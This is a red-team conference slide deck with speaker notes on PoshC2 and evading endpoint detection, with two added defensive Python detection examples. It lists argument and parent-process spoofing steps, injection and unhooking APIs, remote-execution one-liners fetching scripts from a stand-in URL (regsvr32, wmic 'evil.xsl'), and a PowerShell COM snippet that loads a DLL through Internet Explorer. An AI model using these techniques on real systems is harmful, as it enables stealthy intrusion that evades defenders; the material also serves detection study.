    AND process.path contains NOT 'sdiagnhost.exe'
    AND process.path contains NOT 'servermanager.exe'
    AND process.path contains NOT 'sqlps.exe'
    AND process.path contains NOT 'wsmprovhost.exe'
    AND process.path contains NOT 'Microsoft Azure AD Sync\Bin\miiserver.exe'
    (Does require process tracing to be enabled in Tanium - quite heavy)
    Warning - Not doing a hash checksum on the processes or their location
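The warning on the slide above (and the "filter out powershell.exe, and others" step on the Carbon Black slide) is the whole story: a signal that excludes processes by file name is satisfied by any binary that happens to be called powershell.exe, wherever it lives and whatever it is. The Python below is an added example written for this page, not code from the talk, Tanium or Carbon Black; it evaluates the slide's name-only exclusion list and a hardened version keyed on full path plus image hash over constructed module-load telemetry (the paths, hashes and the ModLoad record shape are all constructed for illustration).

```python
"""Module-load signal for System.Management.Automation: name-only exclusion
(as on the slide) versus full-path + hash allowlisting.  Added example; the
telemetry records and hashes are constructed, not real EDR data."""
import hashlib
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ModLoad:
    process_path: str    # full path of the process that loaded the module
    image_path: str      # full path of the DLL that was loaded
    process_sha256: str  # hash of the process image on disk


def constructed_sha256(label: str) -> str:
    """Stand-in for a real file hash so the example runs offline."""
    return hashlib.sha256(label.encode()).hexdigest()


# The process names the slide's Tanium signal excludes, matched by basename.
NAME_ALLOWLIST = {
    "mscorsvw.exe", "monitoringhost.exe", "powershell.exe", "powershell_ise.exe",
    "sdiagnhost.exe", "servermanager.exe", "sqlps.exe", "wsmprovhost.exe",
    "miiserver.exe",
}

# Hardened allowlist: exact (lower-cased) path -> expected image hash.
HASH_ALLOWLIST = {
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe":
        constructed_sha256("known-good powershell.exe"),
    r"c:\windows\microsoft.net\framework64\v4.0.30319\mscorsvw.exe":
        constructed_sha256("known-good mscorsvw.exe"),
}

AUTOMATION_DLL = r"c:\windows\microsoft.net\assembly\gac_msil\system.management.automation" \
                 r"\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll"

# Constructed telemetry: the real PowerShell host, a copy of powershell.exe
# dropped in a user temp folder, an unsigned downloader hosting PowerShell,
# the native-image service, and an unrelated load for contrast.
SAMPLE = [
    ModLoad(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            AUTOMATION_DLL, constructed_sha256("known-good powershell.exe")),
    ModLoad(r"C:\Users\jason\AppData\Local\Temp\powershell.exe",
            AUTOMATION_DLL, constructed_sha256("something else entirely")),
    ModLoad(r"C:\Users\jason\Downloads\updater.exe",
            AUTOMATION_DLL, constructed_sha256("updater.exe")),
    ModLoad(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe",
            AUTOMATION_DLL.replace(".dll", ".ni.dll"),
            constructed_sha256("known-good mscorsvw.exe")),
    ModLoad(r"C:\Windows\System32\notepad.exe",
            r"C:\Windows\System32\kernel32.dll", constructed_sha256("notepad.exe")),
]


def loads_automation(ev: ModLoad) -> bool:
    return "system.management.automation" in ev.image_path.lower()


def name_only_signal(ev: ModLoad) -> bool:
    """The slide's logic: fire unless the process basename is excluded."""
    basename = PureWindowsPath(ev.process_path).name.lower()
    return loads_automation(ev) and basename not in NAME_ALLOWLIST


def hardened_signal(ev: ModLoad) -> bool:
    """Fire unless the exact path is allowlisted AND the image hash matches."""
    if not loads_automation(ev):
        return False
    expected = HASH_ALLOWLIST.get(ev.process_path.lower())
    return expected is None or expected != ev.process_sha256


def triage(events=SAMPLE):
    """(process path, name-only verdict, hardened verdict) for every
    System.Management.Automation load in the telemetry."""
    return [(ev.process_path, name_only_signal(ev), hardened_signal(ev))
            for ev in events if loads_automation(ev)]


if __name__ == "__main__":
    for path, loose, strict in triage():
        print(f"{'LOOSE' if loose else '     '} {'STRICT' if strict else '      '} {path}")
```

The copy of powershell.exe in the user's temp folder is invisible to the name-only signal and caught by the hardened one; the genuine host and the native-image service are quiet under both. In production the hash column would come from the EDR's own file metadata rather than being computed here, and the allowlist would be generated from a known-good build rather than typed in.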
  • 37. Parent PID Spoofing / Carbon Black
  • 40. Process Argument Spoofing
    1. Create a process suspended – fake arguments
    2. Identify the PEB using NtQueryInformationProcess
    3. Parse the PEB and command line structure
    4. Overwrite the command line arguments using WriteProcessMemory – real arguments
    5. Resume the process
  • 41. Process Argument Spoofing
    + https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
    + https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
    + https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
  • 42. Process Argument Spoofing – WHY?
    Execution
    + PowerShell one liner
    + regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
    + wmic os get /FORMAT:"evil.xsl"
    Lateral Movement
    + SC \\COMPUTERNAME stop "SERVICENAME"
    + wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%\Temp\batchfile.bat"
  • 44. Partying With EDR
    Migration Basics - Win API Calls:
    + VirtualAllocEx
    + WriteProcessMemory
    + CreateRemoteThread
    http://deniable.org/misc/inject-all-the-things
    However there are many ways to do the same thing, quick examples:
    + RtlCreateUserThread
    + SetWindowsHookEx
    + NtCreateThreadEx
    + QueueUserAPC
  • 46. What is Hooking?
    "In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook." - Wikipedia
  • 53. Bringing Back The Good Times
    + Re-patch memory to remove the JMP to the original code
    + Update the IAT table to point to the correct function
    + Create a stub – to carry out the same system calls
    + Free a number of API calls and use FreeLibrary to remove interfering DLLs
    https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  • 54. Demo
  • 55. Demo
  • 57. COM Intro – just watch this https://vimeo.com/214856542
  • 58. Migrating with COM into IE
    + Spoke about this at Steelcon last year, has proved really handy
    + Has been used to get past some EDRs
    + Breaks the attribution between processes
  • 59. The key to this? Junction folders
    + Junction folders, a technique leaked in the Vault 7 dumps
    + Forms the basis of SandboxEscaper's recent IE 11 sandbox escape
    + After adding some registry keys, allows code to be executed when you navigate to a folder
  • 61. Loading the DLL in IE – first setup the registry
  • 62. How can we use that?
    + If we can get a reference to an IE window we can call
    + URL needs to be in the format shell:::{<GUID>}
    + https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/aa752094(v%3Dvs.85)
  • 63. ShellWindows
    + Great COM class that allows you to enumerate all the currently open IE & Explorer windows and automate them
    + Guess what, you can then get them to navigate to a new location
    + https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx
  • 64. Loading the DLL in IE, PowerShell
    $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
    $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
    $shwin = [System.Activator]::CreateInstance($typeShwin)
    $shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
    <#
    CLSID must be in the format "shell:::{CLSID}"
    Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
    https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
    Further ideas on what payloads you may be able to use
    #>
  • 66. Can you do this in VBA? Yes, of course
  • 67. Can you do this in VBA? Yes, of course
  • 68. COM Callable Wrapper
    + Only use native DLLs? Thankfully not
    + Using CCWs (COM Callable Wrappers) we can write a .NET DLL and configure the registry keys so that when navigated to we can launch a .NET DLL. Use this as a COM hijack if you want.
    + No time to go into CCW in depth but have a read of https://docs.microsoft.com/en-us/dotnet/framework/interop/com-callable-wrapper
    + .NET is started in IE and loads the DLL
    + We need a .NET assembly with a class that implements an interface, and some registry keys
  • 69. COM Callable Wrapper – Class Interface
  • 72. Setting up the .net registry keys
  • 73. Setting up the .net registry keys
    + Just make sure that you create or import the keys from an x64 application or use the explicit 64-bit key from the link below
    + https://docs.microsoft.com/en-us/windows/desktop/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
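The junction folder and CCW slides (59, 68 and 72/73) all come down to the same artefact on the defender's side: a CLSID registered under the user's own hive (HKCU\Software\Classes\CLSID) whose InprocServer32 resolves to a DLL in a user-writable location, optionally with a ShellFolder subkey so that it can be reached as shell:::{CLSID}, or with InprocServer32 set to mscoree.dll and a CodeBase value pointing at the managed assembly, which is how a CCW registration looks. The Python below is an added example written for this page, not code from the talk or PoshC2: it parses a .reg export of the user hive (constructed here) and reports such registrations. The CLSIDs, paths and values in the sample export are constructed; treating "outside Windows / Program Files" as untrusted is an assumption a real hunt would tune to the estate.

```python
"""Hunt a .reg export of HKCU for COM server registrations that point at
user-writable DLLs (COM hijack / junction-folder / CCW style).  Added example;
the registry export below is constructed, not taken from a real host."""
import re

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed HKCU export: a native shell extension in AppData with a
# ShellFolder subkey, a managed (CCW) server whose CodeBase is in AppData,
# and a vendor extension under Program Files for contrast.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}]
@="Sync Helper"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InprocServer32]
@="C:\\Users\\jason\\AppData\\Roaming\\shellext.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\ShellFolder]
"Attributes"=dword:00000000

[HKEY_CURRENT_USER\Software\Classes\CLSID\{22222222-2222-2222-2222-222222222222}\InprocServer32]
@="mscoree.dll"
"ThreadingModel"="Both"
"Class"="Managed.Payload"
"Assembly"="Managed, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null"
"RuntimeVersion"="v4.0.30319"
"CodeBase"="file:///C:/Users/jason/AppData/Roaming/Managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{33333333-3333-3333-3333-333333333333}\InprocServer32]
@="C:\\Program Files\\Vendor\\vendorext.dll"
"ThreadingModel"="Apartment"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"([^"]+)")=(.*)$')
INPROC_RE = re.compile(
    r"^hkey_current_user\\software\\classes\\clsid\\(\{[0-9a-f-]+\})\\inprocserver32$")


def parse_reg(text):
    """Minimal .reg parser: {lower-cased key path: {value name: value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, raw = m.group(1) or "(Default)", m.group(2)
            if raw.startswith('"') and raw.endswith('"'):
                raw = raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            keys[current][name] = raw
    return keys


def effective_path(values):
    """The DLL that will actually be loaded: for a managed (mscoree.dll)
    server that is the CodeBase assembly, otherwise the server itself."""
    server = values.get("(Default)", "")
    codebase = values.get("CodeBase")
    if server.lower().endswith("mscoree.dll") and codebase:
        path = codebase[8:] if codebase.lower().startswith("file:///") else codebase
        return path.replace("/", "\\")
    return server


def hunt(reg_text):
    keys = parse_reg(reg_text)
    findings = []
    for key, values in keys.items():
        m = INPROC_RE.match(key)
        if not m:
            continue
        path = effective_path(values)
        managed = values.get("(Default)", "").lower().endswith("mscoree.dll")
        reasons = []
        if not path.lower().startswith(TRUSTED_ROOTS):
            reasons.append("server outside trusted directories")
        if key[: -len("\\inprocserver32")] + "\\shellfolder" in keys:
            reasons.append("ShellFolder subkey present")
        if reasons:
            findings.append({"clsid": m.group(1).upper(), "path": path,
                             "managed": managed, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_REG):
        print(f"{f['clsid']} {'managed' if f['managed'] else 'native '} {f['path']}: "
              + "; ".join(f["reasons"]))
```

Both hostile registrations are reported with the DLL that would really be loaded (for the CCW case that is the CodeBase assembly, not mscoree.dll), while the vendor extension under Program Files is left alone. On a live host the same logic would run over `reg export HKCU\Software\Classes\CLSID` output, and the 64-bit versus 32-bit view the slide warns about matters equally when collecting: export from a 64-bit process or the hijacked view may be the one you miss.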
  • 74. Also guess what the IE shortcut now does?
  • 75. One last thing – remember this script
    $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
    $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
    $shwin = [System.Activator]::CreateInstance($typeShwin)
    $shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
    <#
    CLSID must be in the format "shell:::{CLSID}"
    Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
    https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
    Further ideas on what payloads you may be able to use
    #>
  • 76. Let's tweak it
    $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
    $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
    $shwin = [System.Activator]::CreateInstance($typeShwin)
    $shwin[0].Navigate("c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe")
  • 77. Running it (must have at least 1 explorer window open)
  • 78. Look who the parent is?
  • 79. EDR Summary
    + EDR is not a silver bullet
    + Does give incredible visibility to the Blue Team
    + Highly recommended as a complementary piece of the defensive strategy, but should not be solely relied on
    + Does not replace good people with experience
    + Constant cat and mouse game
  • 80. Future Predictions
    1. Over-reliance on EDR, especially on user endpoints and not server land or non-Windows systems
    2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data
    3. Move to Zero Trust networks and MFA everywhere
    4. Machine Learning – investment into process & procedures
    5. C2 frameworks moving to C++ base code – could see MSF be revived for red teaming
    6. All standard AV/EDR vendors adopting in-memory scanning / AMSI
    7. Windows 7 is EOL January 2020 – not a prediction but a reality
    8. Windows 10 removal of .NET v2 – not a prediction but a reality
    9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
  • 81. Future Predictions
    1. Over-reliance on EDR, especially on endpoints and not server land (or Unix really)
    2. C2 frameworks moving to C++ base code – could see MSF be revived for RT
    3. We already have this level of capability and it's interesting what gets detected and what does not
    4. All standard AV/EDR vendors adopting in-memory scanning
    5. Windows 7 is EOL January 2020 – not a prediction but a massive jump
    6. Windows 10 removal of .NET v2
    7. People going back to single executables running either C++ or C# code to evade LOLBin signatures and
  • 82. THANK YOU
    Ben Turner @benpturner
    Doug McLeod @b4ggio_su
    Rob Maslen @rbmaslen
    https://www.steelcon.info/training/
    https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning

Editor's Notes

  1. So whoami! My name is Ben Turner, I head up the Global Red Team @ Nettitude. As evident from the geeky title I'm a PowerShell & .NET enthusiast! One of the main reasons I'm standing here (on top of being accepted to talk) is because over the last two years I've seen and met 3 or 4 people who have explicitly said to me they are in the industry and want to do red teaming because they saw my talks and were inspired! This really resonated with me and I thought I want to encourage anyone to get up and talk. The industry as a whole has some people who try to crush people but
  2. Some other places you may have seen us is at Derbycon, we're quite a keen attender of this conference. If you like CTFs check out some of the blogs we wrote off the back of the cons. It will be sad this year it's coming to an end – hopefully we can go out with a bang and maintain that 1st place position!
  3. .NET reflection can unhook
  4. So there has been a lot of talk about PowerShell being dead and I wanted to share my small view of the world, with a slight focus on the evolution of PoshC2. For those not aware, PoshC2 is a command and control framework that was created purely in PowerShell, designed to run on any Windows endpoint. RAT – NOT Malware… First of all created for learning purposes and evolved into much more; it really started out as 60 lines of code – this was including the logo! And now is in the 10s of thousands of lines of code. Let's think from an OPSEC perspective and show the start of PoshC2
  5. Started out as a Windows-only C2 server and C2 implant written only in PowerShell…
  6. Can anyone tell me what's wrong with this picture! PAUSE……………………….. Probably more obvious, a malicious PowerShell process has started as the user Jason…
  7. Let's dig a bit deeper and look at what the PowerShell command line arguments look like to start with… This is the default PoshC2 PowerShell implant. Simple detections: anything running "powershell.exe", especially spawned from Office, mshta, VBScript, JScript etc.
  8. How easy is it to spot this
  9. Presence of the normal, abnormal presence of the???? Can you threat hunt across your estate?
  10. NO! It's just getting more difficult to deploy, and is only as good as the monitoring in place. There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
  12. All throughout 2018 APT 33 were being tracked by FireEye, amongst many other known threat actor groups, but the reason I pick on these guys is that they have been known to use PoshC2. People have been calling PoshC2 malware, but I would call this a remote access toolkit (RAT) that can be used for multiple purposes
  13. Attribution is most likely Iran, and typically used across the aerospace and energy sectors… What's really interesting here is that the IOCs (indicators of compromise) are that the threat actor is using the defaults, e.g. PowerShell one liners, and are still having a huge amount of success. Explicitly a guy called Andrew from FireEye – @QW5kcmV3
  14. The next big thing is the C# implant This is where it gets tough to find an implant as the clr.dll or mscoree.dll is loaded into more things than you realise
  17. DEMO!!!!! IF WE HAVE TIME
  18. Endpoint Detection and response is software that sends behavioural data to a central database for analysis
  19. This is us when we run a process list and see an EDR system!! But all is not lost and we have some example stories about challenges faced with different EDR solutions. Behaviour based, not just signature
  20. We thought the blue team were watching an account which we needed to use. So we distracted them. We know Carbon Black will flag on unsigned binaries connecting to the internet, so we pushed out unsigned binaries to a handful of machines and ran them. Enough to keep them busy
  21. If the blue team have so much visibility, how can we throw them off the scent? This is trickery and there are many things that can be done, but two that I'm going to lightly cover are Parent PID spoofing and Argument spoofing… deliberately to mess with process chaining.
  22. STARTUPINFOEX This structure contains an lpAttributeList Update pid using UpdateProcThreadAttribute
  23. Event Tracing for Windows – ETW First screenshot shows the parent section process the same as the one below. Second example shows that the parent process and the Process ID in the parent are different.
  24. Process Argument Spoofing. First off, got to give credit to some of the initial people discussing this: Casey Smith and Will Burgess. If you haven't seen Will's talk - Red Teaming in the EDR Age - then you should definitely go give it a watch. Also covers a tool they created, Gargoyle, to hide malware in memory.
  25. And, finally, programs that determine process arguments by reading the process PEB will see your real arguments and not our fake arguments.
  26. Migration basics – a number of API calls – generally a basic example will take a handle on another process and call VirtualAllocEx, WriteProcessMemory and CreateRemoteThread. These are not the only options available to us. Inject all the things – is a nice project to assist in testing some of these calls – you should check it out. Instead of using CreateRemoteThread we can use for example RtlCreateUserThread – this bypassed the checks Symantec were looking for and we ended up with successful migration.
  27. In short it is a technique that allows you to alter or augment the behaviour of the operating system. Hook a function do bad things……. In old school gaming this is equivalent to hacking a game so that you cannot die.
  28. Turns out the last option is super common. Kernel Patch Protection or PatchGuard scans the kernel on almost every level and will trigger a BSOD if a modification is detected. This includes the areas where the Win API's logic is carried out.
  29. ZwCreateThreadEx
  30. In Process Client
  31. Hoang Bui XPN Many other examples – show these options to be rather easy.
  33. My house my rules What am I going to do about it? F*cking Judo Chop it the hell outta there!
  34. @fsx30 XPN Many other examples – show these options to be rather easy.
  35. Navigating to this folder means that code will be executed within explorer
  47. Turns out the last option is super common
  48. We already have this level of capability and it's interesting what gets detected and what does not. Harder to pwn 2003/XP/NT. Palantir, AI, machine learning, Darktrace… Microsoft ATA, ATP, Defender
  49. BEN: